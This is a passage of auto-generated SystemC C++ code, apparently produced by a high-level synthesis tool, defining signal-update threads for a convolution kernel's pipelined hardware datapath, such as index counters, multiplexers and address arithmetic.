((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage10.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage10_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p1 = bufi_load_11_reg_3539.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage9.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage9_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p1 = bufi_load_10_reg_3504.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage8.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage8_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p1 = bufi_load_9_reg_3469.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage7.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage7_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p1 = bufi_load_8_reg_3439.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage6.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage6_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p1 = bufi_load_7_reg_3404.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage5.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage5_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p1 = bufi_load_6_reg_3339.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage4.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage4_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p1 = bufi_load_5_reg_3269.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage3.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage3_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p1 = bufi_load_4_reg_3159.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage2.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage2_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p1 = bufi_load_3_reg_3109.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage1.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage1_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p1 = bufi_load_2_reg_3059.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p1 = bufi_load_1_reg_2974.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage13.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage13_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p1 = bufi_load_reg_2924.read(); } else { grp_fu_571_p1 = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"; } } void convolve_kernel::thread_grp_fu_890_p0() { grp_fu_890_p0 = esl_concat<55,9>(ap_const_lv55_0, tmp_57_fu_866_p2.read()); } void convolve_kernel::thread_grp_fu_890_p1() { grp_fu_890_p1 = esl_concat<62,2>(esl_concat<53,9>(ap_const_lv53_0, tmp_57_fu_866_p2.read()), ap_const_lv2_0); } void convolve_kernel::thread_grp_fu_920_p0() { grp_fu_920_p0 = esl_concat<55,9>(ap_const_lv55_0, tmp_112_fu_896_p2.read()); } void convolve_kernel::thread_grp_fu_920_p1() { grp_fu_920_p1 = esl_concat<62,2>(esl_concat<53,9>(ap_const_lv53_0, tmp_112_fu_896_p2.read()), ap_const_lv2_0); } void convolve_kernel::thread_i_1_fu_749_p2() { i_1_fu_749_p2 = (!ap_const_lv3_1.is_01() || !i_reg_472.read().is_01())? sc_lv<3>(): (sc_biguint<3>(ap_const_lv3_1) + sc_biguint<3>(i_reg_472.read())); } void convolve_kernel::thread_i_cast6_mid2_fu_1148_p1() { i_cast6_mid2_fu_1148_p1 = esl_zext<64,3>(i_cast7_mid2_reg_2386.read()); } void convolve_kernel::thread_i_cast7_fu_581_p1() { i_cast7_fu_581_p1 = esl_zext<6,3>(i_phi_fu_476_p4.read()); } void convolve_kernel::thread_i_cast7_mid2_cast_fu_931_p1() { i_cast7_mid2_cast_fu_931_p1 = esl_zext<6,3>(i_cast7_mid2_reg_2386.read()); } void convolve_kernel::thread_i_cast7_mid2_fu_803_p3() { i_cast7_mid2_fu_803_p3 = (!exitcond_flatten_reg_2238.read()[0].is_01())? sc_lv<3>(): ((exitcond_flatten_reg_2238.read()[0].to_bool())? i_1_reg_2345.read(): i_reg_472.read()); } void convolve_kernel::thread_i_phi_fu_476_p4() { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00000000.read(), ap_const_boolean_0))) { i_phi_fu_476_p4 = i_cast7_mid2_reg_2386.read(); } else { i_phi_fu_476_p4 = i_reg_472.read(); } } void convolve_kernel::thread_indvar_flatten1_phi_fu_465_p4() { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00000000.read(), ap_const_boolean_0))) { indvar_flatten1_phi_fu_465_p4 = indvar_flatten_next3_reg_2233.read(); } else { indvar_flatten1_phi_fu_465_p4 = indvar_flatten1_reg_461.read(); } } void convolve_kernel::thread_indvar_flatten2_phi_fu_488_p4() { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00000000.read(), ap_const_boolean_0))) { indvar_flatten2_phi_fu_488_p4 = indvar_flatten_next2_reg_2280.read(); } else { indvar_flatten2_phi_fu_488_p4 = indvar_flatten2_reg_484.read(); } } void convolve_kernel::thread_indvar_flatten3_phi_fu_511_p4() { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00000000.read(), ap_const_boolean_0))) { indvar_flatten3_phi_fu_511_p4 = indvar_flatten_next1_reg_2381.read(); } else { indvar_flatten3_phi_fu_511_p4 = indvar_flatten3_reg_507.read(); } } void convolve_kernel::thread_indvar_flatten41_op_fu_743_p2() { indvar_flatten41_op_fu_743_p2 = (!ap_const_lv14_1.is_01() || !indvar_flatten3_reg_507.read().is_01())? sc_lv<14>(): (sc_biguint<14>(ap_const_lv14_1) + sc_biguint<14>(indvar_flatten3_reg_507.read())); } void convolve_kernel::thread_indvar_flatten81_op_fu_645_p2() { indvar_flatten81_op_fu_645_p2 = (!ap_const_lv16_1.is_01() || !indvar_flatten2_phi_fu_488_p4.read().is_01())? sc_lv<16>(): (sc_biguint<16>(ap_const_lv16_1) + sc_biguint<16>(indvar_flatten2_phi_fu_488_p4.read())); } void convolve_kernel::thread_indvar_flatten_next1_fu_797_p3() { indvar_flatten_next1_fu_797_p3 = (!tmp_3_reg_2315.read()[0].is_01())? sc_lv<14>(): ((tmp_3_reg_2315.read()[0].to_bool())? ap_const_lv14_1: indvar_flatten41_op_reg_2340.read()); } void convolve_kernel::thread_indvar_flatten_next2_fu_672_p3() { indvar_flatten_next2_fu_672_p3 = (!exitcond_flatten_reg_2238.read()[0].is_01())? sc_lv<16>(): ((exitcond_flatten_reg_2238.read()[0].to_bool())? ap_const_lv16_1: indvar_flatten81_op_reg_2257.read()); } void convolve_kernel::thread_indvar_flatten_next3_fu_627_p2() { indvar_flatten_next3_fu_627_p2 = (!ap_const_lv17_1.is_01() || !indvar_flatten1_phi_fu_465_p4.read().is_01())? sc_lv<17>(): (sc_biguint<17>(ap_const_lv17_1) + sc_biguint<17>(indvar_flatten1_phi_fu_465_p4.read())); } void convolve_kernel::thread_indvar_flatten_next_fu_791_p3() { indvar_flatten_next_fu_791_p3 = (!tmp_7_reg_2322.read()[0].is_01())? sc_lv<10>(): ((tmp_7_reg_2322.read()[0].to_bool())? ap_const_lv10_1: indvar_flatten_op_reg_2335.read()); } void convolve_kernel::thread_indvar_flatten_op_fu_737_p2() { indvar_flatten_op_fu_737_p2 = (!ap_const_lv10_1.is_01() || !indvar_flatten_reg_531.read().is_01())? sc_lv<10>(): (sc_biguint<10>(ap_const_lv10_1) + sc_biguint<10>(indvar_flatten_reg_531.read())); } void convolve_kernel::thread_indvar_flatten_phi_fu_535_p4() { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage1.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage1_flag00000000.read(), ap_const_boolean_0))) { indvar_flatten_phi_fu_535_p4 = indvar_flatten_next_reg_2376.read(); } else { indvar_flatten_phi_fu_535_p4 = indvar_flatten_reg_531.read(); } } void convolve_kernel::thread_j_1_fu_755_p2() { j_1_fu_755_p2 = (!ap_const_lv3_1.is_01() || !j_mid_reg_2309.read().is_01())? sc_lv<3>(): (sc_biguint<3>(ap_const_lv3_1) + sc_biguint<3>(j_mid_reg_2309.read())); } void convolve_kernel::thread_j_cast4_mid1_cast_fu_952_p1() { j_cast4_mid1_cast_fu_952_p1 = esl_zext<6,3>(j_1_reg_2351.read()); } void convolve_kernel::thread_j_cast4_mid2_cast_fu_1151_p1() { j_cast4_mid2_cast_fu_1151_p1 = esl_zext<14,3>(j_cast5_mid2_reg_2395.read()); } void convolve_kernel::thread_j_cast5_fu_585_p1() { j_cast5_fu_585_p1 = esl_zext<6,3>(j_phi_fu_499_p4.read()); } void convolve_kernel::thread_j_cast5_mid2_cast_fu_949_p1() { j_cast5_mid2_cast_fu_949_p1 = esl_zext<6,3>(j_cast5_mid2_reg_2395.read()); } void convolve_kernel::thread_j_cast5_mid2_fu_809_p3() { j_cast5_mid2_fu_809_p3 = (!exitcond_flatten43_m_reg_2290.read()[0].is_01())? sc_lv<3>(): ((exitcond_flatten43_m_reg_2290.read()[0].to_bool())? j_1_reg_2351.read(): j_mid_reg_2309.read()); } void convolve_kernel::thread_j_mid_fu_697_p3() { j_mid_fu_697_p3 = (!exitcond_flatten_reg_2238.read()[0].is_01())? sc_lv<3>(): ((exitcond_flatten_reg_2238.read()[0].to_bool())? ap_const_lv3_0: j_reg_495.read()); } void convolve_kernel::thread_j_phi_fu_499_p4() { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00000000.read(), ap_const_boolean_0))) { j_phi_fu_499_p4 = j_cast5_mid2_reg_2395.read(); } else { j_phi_fu_499_p4 = j_reg_495.read(); } } void convolve_kernel::thread_not_exitcond_flatten_1_fu_667_p2() { not_exitcond_flatten_1_fu_667_p2 = (exitcond_flatten_reg_2238.read() | exitcond_flatten43_n_fu_662_p2.read()); } void convolve_kernel::thread_not_exitcond_flatten_2_fu_726_p2() { not_exitcond_flatten_2_fu_726_p2 = (exitcond_flatten_mid_2_reg_2299.read() ^ ap_const_lv1_1); } void convolve_kernel::thread_not_exitcond_flatten_fu_651_p2() { not_exitcond_flatten_fu_651_p2 = (exitcond_flatten_reg_2238.read() ^ ap_const_lv1_1); } void convolve_kernel::thread_p_shl10_cast_fu_2034_p3() { p_shl10_cast_fu_2034_p3 = esl_concat<12,2>(tmp_172_reg_3229.read(), ap_const_lv2_0); } void convolve_kernel::thread_p_shl12_cast_fu_2022_p3() { p_shl12_cast_fu_2022_p3 = esl_concat<12,2>(tmp_161_reg_3219.read(), ap_const_lv2_0); } void convolve_kernel::thread_p_shl14_cast_fu_2010_p3() { p_shl14_cast_fu_2010_p3 = esl_concat<12,2>(tmp_147_reg_3209.read(), ap_const_lv2_0); } void convolve_kernel::thread_p_shl16_cast_fu_1998_p3() { p_shl16_cast_fu_1998_p3 = esl_concat<12,2>(tmp_133_reg_3199.read(), ap_const_lv2_0); } void convolve_kernel::thread_p_shl18_cast_fu_1302_p4() { p_shl18_cast_fu_1302_p4 = esl_concat<12,2>(esl_concat<9,3>(tmp_119_reg_2557.read(), tmp_116_reg_2644.read()), ap_const_lv2_0); } void convolve_kernel::thread_p_shl1_cast_fu_1161_p1() { p_shl1_cast_fu_1161_p1 = esl_zext<16,11>(tmp_11_fu_1154_p3.read()); } void convolve_kernel::thread_p_shl20_cast_fu_1909_p3() { p_shl20_cast_fu_1909_p3 = esl_concat<12,2>(tmp_115_reg_3149.read(), ap_const_lv2_0); } void convolve_kernel::thread_p_shl22_cast_fu_1868_p3() { p_shl22_cast_fu_1868_p3 = esl_concat<12,2>(tmp_102_reg_3099.read(), ap_const_lv2_0); } void convolve_kernel::thread_p_shl24_cast_fu_1799_p3() { p_shl24_cast_fu_1799_p3 = esl_concat<12,2>(tmp_94_reg_3019.read(), ap_const_lv2_0); } void convolve_kernel::thread_p_shl26_cast_fu_1754_p3() { p_shl26_cast_fu_1754_p3 = esl_concat<12,2>(tmp_86_reg_2964.read(), ap_const_lv2_0); } void convolve_kernel::thread_p_shl28_cast_fu_1709_p3() { p_shl28_cast_fu_1709_p3 = esl_concat<12,2>(tmp_78_reg_2844.read(), ap_const_lv2_0); } void convolve_kernel::thread_p_shl2_cast_fu_1172_p1() { p_shl2_cast_fu_1172_p1 = esl_zext<16,8>(tmp_12_fu_1165_p3.read()); } void convolve_kernel::thread_p_shl30_cast_fu_1461_p3() { p_shl30_cast_fu_1461_p3 = esl_concat<12,2>(tmp_70_reg_2779.read(), ap_const_lv2_0); } void convolve_kernel::thread_p_shl32_cast_fu_1387_p3() { p_shl32_cast_fu_1387_p3 = esl_concat<12,2>(tmp_62_reg_2729.read(), ap_const_lv2_0); } void convolve_kernel::thread_p_shl34_cast_fu_1075_p4() { p_shl34_cast_fu_1075_p4 = esl_concat<12,2>(esl_concat<9,3>(tmp_53_reg_2437.read(), tmp_52_reg_2500.read()), ap_const_lv2_0); } void convolve_kernel::thread_p_shl3_cast_fu_842_p1() { p_shl3_cast_fu_842_p1 = esl_zext<12,11>(tmp_49_fu_835_p3.read()); } void convolve_kernel::thread_p_shl6_cast_fu_2058_p3() { p_shl6_cast_fu_2058_p3 = esl_concat<12,2>(tmp_177_reg_3249.read(), ap_const_lv2_0); } void convolve_kernel::thread_p_shl8_cast_fu_2046_p3() { p_shl8_cast_fu_2046_p3 = esl_concat<12,2>(tmp_175_reg_3239.read(), ap_const_lv2_0); } void convolve_kernel::thread_p_shl_cast_fu_2070_p3() { p_shl_cast_fu_2070_p3 = esl_concat<12,2>(tmp_179_reg_3259.read(), ap_const_lv2_0); } void convolve_kernel::thread_row_b_1_fu_814_p2() { row_b_1_fu_814_p2 = (!ap_const_lv5_1.is_01() || !row_b_mid_reg_2357.read().is_01())? sc_lv<5>(): (sc_biguint<5>(ap_const_lv5_1) + sc_biguint<5>(row_b_mid_reg_2357.read())); } void convolve_kernel::thread_row_b_cast3_mid2_cas_fu_1049_p1() { row_b_cast3_mid2_cas_fu_1049_p1 = esl_zext<10,5>(row_b_cast3_mid2_reg_2473.read()); } void convolve_kernel::thread_row_b_cast3_mid2_fu_969_p3() { row_b_cast3_mid2_fu_969_p3 = (!exitcond_flatten_mid_2_reg_2299.read()[0].is_01())? sc_lv<5>(): ((exitcond_flatten_mid_2_reg_2299.read()[0].to_bool())? row_b_1_reg_2402.read(): row_b_mid_reg_2357.read()); } void convolve_kernel::thread_row_b_mid_fu_760_p3() { row_b_mid_fu_760_p3 = (!tmp_3_reg_2315.read()[0].is_01())? sc_lv<5>(): ((tmp_3_reg_2315.read()[0].to_bool())? ap_const_lv5_0: row_b_reg_519.read()); } void convolve_kernel::thread_row_b_phi_fu_523_p4() { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00000000.read(), ap_const_boolean_0))) { row_b_phi_fu_523_p4 = row_b_cast3_mid2_reg_2473.read(); } else { row_b_phi_fu_523_p4 = row_b_reg_519.read(); } } void convolve_kernel::thread_tmp_101_fu_1811_p1() { tmp_101_fu_1811_p1 = grp_fu_1729_p2.read().range(14-1, 0); } void convolve_kernel::thread_tmp_102_fu_1815_p1() { tmp_102_fu_1815_p1 = grp_fu_1729_p2.read().range(12-1, 0); } void convolve_kernel::thread_tmp_103_fu_1875_p2() { tmp_103_fu_1875_p2 = (!tmp_101_reg_3094.read().is_01() || !p_shl22_cast_fu_1868_p3.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_101_reg_3094.read()) + sc_biguint<14>(p_shl22_cast_fu_1868_p3.read())); } void convolve_kernel::thread_tmp_104_cast_fu_1990_p1() { tmp_104_cast_fu_1990_p1 = esl_zext<64,14>(tmp_104_reg_3184.read()); } void convolve_kernel::thread_tmp_104_fu_1905_p2() { tmp_104_fu_1905_p2 = (!tmp_103_reg_3139.read().is_01() || !j_cast4_mid2_cast_reg_2585.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_103_reg_3139.read()) + sc_biguint<14>(j_cast4_mid2_cast_reg_2585.read())); } void convolve_kernel::thread_tmp_105_fu_1411_p2() { tmp_105_fu_1411_p2 = (tmp_48_reg_2414.read() | ap_const_lv9_7); } void convolve_kernel::thread_tmp_109_fu_1880_p1() { tmp_109_fu_1880_p1 = grp_fu_1774_p2.read().range(14-1, 0); } void convolve_kernel::thread_tmp_110_fu_1916_p2() { tmp_110_fu_1916_p2 = (!tmp_109_reg_3144.read().is_01() || !p_shl20_cast_fu_1909_p3.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_109_reg_3144.read()) + sc_biguint<14>(p_shl20_cast_fu_1909_p3.read())); } void convolve_kernel::thread_tmp_111_cast_fu_2095_p1() { tmp_111_cast_fu_2095_p1 = esl_zext<64,14>(tmp_111_reg_3294.read()); } void convolve_kernel::thread_tmp_111_fu_1994_p2() { tmp_111_fu_1994_p2 = (!tmp_110_reg_3189.read().is_01() || !j_cast4_mid2_cast_reg_2585.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_110_reg_3189.read()) + sc_biguint<14>(j_cast4_mid2_cast_reg_2585.read())); } void convolve_kernel::thread_tmp_112_fu_896_p2() { tmp_112_fu_896_p2 = (tmp_48_fu_824_p3.read() | ap_const_lv9_8); } void convolve_kernel::thread_tmp_115_fu_1884_p1() { tmp_115_fu_1884_p1 = grp_fu_1774_p2.read().range(12-1, 0); } void convolve_kernel::thread_tmp_116_fu_1224_p2() { tmp_116_fu_1224_p2 = (tmp_117_reg_2547.read() | i_cast7_mid2_reg_2386.read()); } void convolve_kernel::thread_tmp_117_fu_1118_p1() { tmp_117_fu_1118_p1 = grp_fu_920_p2.read().range(3-1, 0); } void convolve_kernel::thread_tmp_118_cast_fu_1296_p3() { tmp_118_cast_fu_1296_p3 = esl_concat<11,3>(tmp_118_reg_2552.read(), tmp_116_reg_2644.read()); } void convolve_kernel::thread_tmp_11_fu_1154_p3() { tmp_11_fu_1154_p3 = esl_concat<6,5>(tmp_6_cast_mid2_reg_2516.read(), ap_const_lv5_0); } void convolve_kernel::thread_tmp_120_fu_1310_p2() { tmp_120_fu_1310_p2 = (!tmp_118_cast_fu_1296_p3.read().is_01() || !p_shl18_cast_fu_1302_p4.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_118_cast_fu_1296_p3.read()) + sc_biguint<14>(p_shl18_cast_fu_1302_p4.read())); } void convolve_kernel::thread_tmp_121_cast_fu_1440_p1() { tmp_121_cast_fu_1440_p1 = esl_zext<64,14>(tmp_121_reg_2749.read()); } void convolve_kernel::thread_tmp_121_fu_1370_p2() { tmp_121_fu_1370_p2 = (!tmp_120_reg_2704.read().is_01() || !j_cast4_mid2_cast_reg_2585.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_120_reg_2704.read()) + sc_biguint<14>(j_cast4_mid2_cast_reg_2585.read())); } void convolve_kernel::thread_tmp_122_fu_1485_p2() { tmp_122_fu_1485_p2 = (tmp_48_reg_2414.read() | ap_const_lv9_9); } void convolve_kernel::thread_tmp_126_fu_1921_p1() { tmp_126_fu_1921_p1 = grp_fu_1819_p2.read().range(14-1, 0); } void convolve_kernel::thread_tmp_127_fu_2005_p2() { tmp_127_fu_2005_p2 = (!tmp_126_reg_3194.read().is_01() || !p_shl16_cast_fu_1998_p3.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_126_reg_3194.read()) + sc_biguint<14>(p_shl16_cast_fu_1998_p3.read())); } void convolve_kernel::thread_tmp_128_cast_fu_2140_p1() { tmp_128_cast_fu_2140_p1 = esl_zext<64,14>(tmp_128_reg_3364.read()); } void convolve_kernel::thread_tmp_128_fu_2099_p2() { tmp_128_fu_2099_p2 = (!tmp_127_reg_3299.read().is_01() || !j_cast4_mid2_cast_reg_2585.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_127_reg_3299.read()) + sc_biguint<14>(j_cast4_mid2_cast_reg_2585.read())); } void convolve_kernel::thread_tmp_129_fu_1514_p2() { tmp_129_fu_1514_p2 = (tmp_48_reg_2414.read() | ap_const_lv9_A); } void convolve_kernel::thread_tmp_12_fu_1165_p3() { tmp_12_fu_1165_p3 = esl_concat<6,2>(tmp_6_cast_mid2_reg_2516.read(), ap_const_lv2_0); } void convolve_kernel::thread_tmp_133_fu_1925_p1() { tmp_133_fu_1925_p1 = grp_fu_1819_p2.read().range(12-1, 0); } void convolve_kernel::thread_tmp_134_fu_2017_p2() { tmp_134_fu_2017_p2 = (!tmp_140_reg_3204.read().is_01() || !p_shl14_cast_fu_2010_p3.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_140_reg_3204.read()) + sc_biguint<14>(p_shl14_cast_fu_2010_p3.read())); } void convolve_kernel::thread_tmp_135_cast_fu_2157_p1() { tmp_135_cast_fu_2157_p1 = esl_zext<64,14>(tmp_135_reg_3369.read()); } void convolve_kernel::thread_tmp_135_fu_2103_p2() { tmp_135_fu_2103_p2 = (!tmp_134_reg_3304.read().is_01() || !j_cast4_mid2_cast_reg_2585.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_134_reg_3304.read()) + sc_biguint<14>(j_cast4_mid2_cast_reg_2585.read())); } void convolve_kernel::thread_tmp_136_fu_1543_p2() { tmp_136_fu_1543_p2 = (tmp_48_reg_2414.read() | ap_const_lv9_B); } void convolve_kernel::thread_tmp_13_fu_1176_p2() { tmp_13_fu_1176_p2 = (!p_shl2_cast_fu_1172_p1.read().is_01() || !p_shl1_cast_fu_1161_p1.read().is_01())? sc_lv<16>(): (sc_biguint<16>(p_shl2_cast_fu_1172_p1.read()) + sc_biguint<16>(p_shl1_cast_fu_1161_p1.read())); } void convolve_kernel::thread_tmp_140_fu_1929_p1() { tmp_140_fu_1929_p1 = grp_fu_1823_p2.read().range(14-1, 0); } void convolve_kernel::thread_tmp_141_fu_2029_p2() { tmp_141_fu_2029_p2 = (!tmp_154_reg_3214.read().is_01() || !p_shl12_cast_fu_2022_p3.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_154_reg_3214.read()) + sc_biguint<14>(p_shl12_cast_fu_2022_p3.read())); } void convolve_kernel::thread_tmp_142_cast_fu_2179_p1() { tmp_142_cast_fu_2179_p1 = esl_zext<64,14>(tmp_142_reg_3374.read()); } void convolve_kernel::thread_tmp_142_fu_2107_p2() { tmp_142_fu_2107_p2 = (!tmp_141_reg_3309.read().is_01() || !j_cast4_mid2_cast_reg_2585.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_141_reg_3309.read()) + sc_biguint<14>(j_cast4_mid2_cast_reg_2585.read())); } void convolve_kernel::thread_tmp_143_fu_1572_p2() { tmp_143_fu_1572_p2 = (tmp_48_reg_2414.read() | ap_const_lv9_C); } void convolve_kernel::thread_tmp_147_fu_1933_p1() { tmp_147_fu_1933_p1 = grp_fu_1823_p2.read().range(12-1, 0); } void convolve_kernel::thread_tmp_148_fu_2041_p2() { tmp_148_fu_2041_p2 = (!tmp_168_reg_3224.read().is_01() || !p_shl10_cast_fu_2034_p3.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_168_reg_3224.read()) + sc_biguint<14>(p_shl10_cast_fu_2034_p3.read())); } void convolve_kernel::thread_tmp_149_cast_fu_2195_p1() { tmp_149_cast_fu_2195_p1 = esl_zext<64,14>(tmp_149_reg_3379.read()); } void convolve_kernel::thread_tmp_149_fu_2111_p2() { tmp_149_fu_2111_p2 = (!tmp_148_reg_3314.read().is_01() || !j_cast4_mid2_cast_reg_2585.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_148_reg_3314.read()) + sc_biguint<14>(j_cast4_mid2_cast_reg_2585.read())); } void convolve_kernel::thread_tmp_14_fu_1246_p2() { tmp_14_fu_1246_p2 = (!ap_const_lv16_510.is_01() || !tmp_13_reg_2604.read().is_01())? sc_lv<16>(): (sc_biguint<16>(ap_const_lv16_510) + sc_biguint<16>(tmp_13_reg_2604.read())); } void convolve_kernel::thread_tmp_150_fu_1601_p2() { tmp_150_fu_1601_p2 = (tmp_48_reg_2414.read() | ap_const_lv9_D); } void convolve_kernel::thread_tmp_154_fu_1937_p1() { tmp_154_fu_1937_p1 = grp_fu_1827_p2.read().range(14-1, 0); } void convolve_kernel::thread_tmp_155_fu_2053_p2() { tmp_155_fu_2053_p2 = (!tmp_173_reg_3234.read().is_01() || !p_shl8_cast_fu_2046_p3.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_173_reg_3234.read()) + sc_biguint<14>(p_shl8_cast_fu_2046_p3.read())); } void convolve_kernel::thread_tmp_156_cast_fu_2203_p1() { tmp_156_cast_fu_2203_p1 = esl_zext<64,14>(tmp_156_reg_3384.read()); } void convolve_kernel::thread_tmp_156_fu_2115_p2() { tmp_156_fu_2115_p2 = (!tmp_155_reg_3319.read().is_01() || !j_cast4_mid2_cast_reg_2585.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_155_reg_3319.read()) + sc_biguint<14>(j_cast4_mid2_cast_reg_2585.read())); } void convolve_kernel::thread_tmp_157_fu_1630_p2() { tmp_157_fu_1630_p2 = (tmp_48_reg_2414.read() | ap_const_lv9_E); } void convolve_kernel::thread_tmp_15_fu_1316_p2() { tmp_15_fu_1316_p2 = (!ap_const_lv16_A20.is_01() || !tmp_13_reg_2604.read().is_01())? sc_lv<16>(): (sc_biguint<16>(ap_const_lv16_A20) + sc_biguint<16>(tmp_13_reg_2604.read())); } void convolve_kernel::thread_tmp_161_fu_1941_p1() { tmp_161_fu_1941_p1 = grp_fu_1827_p2.read().range(12-1, 0); } void convolve_kernel::thread_tmp_162_fu_2065_p2() { tmp_162_fu_2065_p2 = (!tmp_176_reg_3244.read().is_01() || !p_shl6_cast_fu_2058_p3.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_176_reg_3244.read()) + sc_biguint<14>(p_shl6_cast_fu_2058_p3.read())); } void convolve_kernel::thread_tmp_163_cast_fu_2211_p1() { tmp_163_cast_fu_2211_p1 = esl_zext<64,14>(tmp_163_reg_3389.read()); } void convolve_kernel::thread_tmp_163_fu_2119_p2() { tmp_163_fu_2119_p2 = (!tmp_162_reg_3324.read().is_01() || 